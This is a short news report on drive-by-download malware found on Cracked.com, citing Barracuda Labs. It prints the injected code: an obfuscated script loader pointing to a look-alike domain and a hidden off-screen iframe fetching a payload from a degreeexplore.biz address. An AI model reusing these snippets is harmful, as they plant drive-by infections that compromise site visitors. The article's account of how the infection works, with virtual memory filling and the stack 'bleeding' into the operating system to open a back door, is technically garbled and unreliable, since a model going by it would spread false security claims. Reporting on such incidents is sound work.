On Monday, November 11th, it was discovered that Cracked[dot]com was infected by malware performing drive by downloads. The discovery comes from Barracuda Labs Research.

The malware was spread through a drive-by-download. The number of systems it has infected is unknown. Given the site is ranked by Alexa as number 289 in the U.S. and 654 worldwide the number is presumed to be high.

The malware is introduced through a JavaScript code that directs a registration call to the domain crackedcdm[dot]com. This domain was registered on November 4th, which suggests the site may have been infected since then. Here is a small sample of the JavaScript registration call:

var tyi = “cdm.”; var itwo = “cracked”; var itto = “/”; var phw = “php”; var jfw = “src”; var fscr = “script”; var twi = “i”; var htp = “http”; var vol54 = “src”;document.write(“<”+fscr+” “+jfw+”=”+htp+”:”+itto+””+itto+””+twi+”.”+itwo+””+tyi+”com”+itto+””+twi+”.”+phw+”><”+itto+””+fscr+”>”);

Once the registration call is completed the following iframe pointing to p68ei5.degreeexplore.biz is inserted:

var urla=’http://p68ei5.degreeexplore.biz:53331/51fd0e1afd1243f00bd4f6473a0bfc41.html’;var divTag=document.createElement(‘div’);divTag.id=’ad3′;document.body.appendChild(divTag);var fr3=document.createElement(‘iframe’);fr3.width=’88px’;fr3.height=’31px’;fr3.setAttribute(‘style’,’position: absolute;left: -8000px;top: 0px;overflow-x: hidden;overflow-y: hidden;’);fr3.setAttribute(‘src’,urla);document.getElementById(‘ad3′).appendChild(fr3);

At this point the iframe sends a flurry of malicious PDFs, Java, HTML, and javascript files into the victim’s browser. This causes virtual memory to become full.

When virtual memory becomes full the stack bleeds out into the operating system creating a back door to inject malware. The injection process goes undetected by antivirus software, making live web protection ineffective. This is a known Windows vulnerability typically exploited in Outlook by email malware. The malware can only be detected during a deep scan of the full system, and if it’s definition exists in the antiviruses definition file.

For more detail on the virus file see the malwr website.

Cracked[dot]com waited until Tuesday to respond to the Barracuda Labs report. They responded in a forum claiming they had fixed the site on Tuesday. Barracuda Labs claims the site is still infected and that similar attacks on the site seem to be a recurring problem.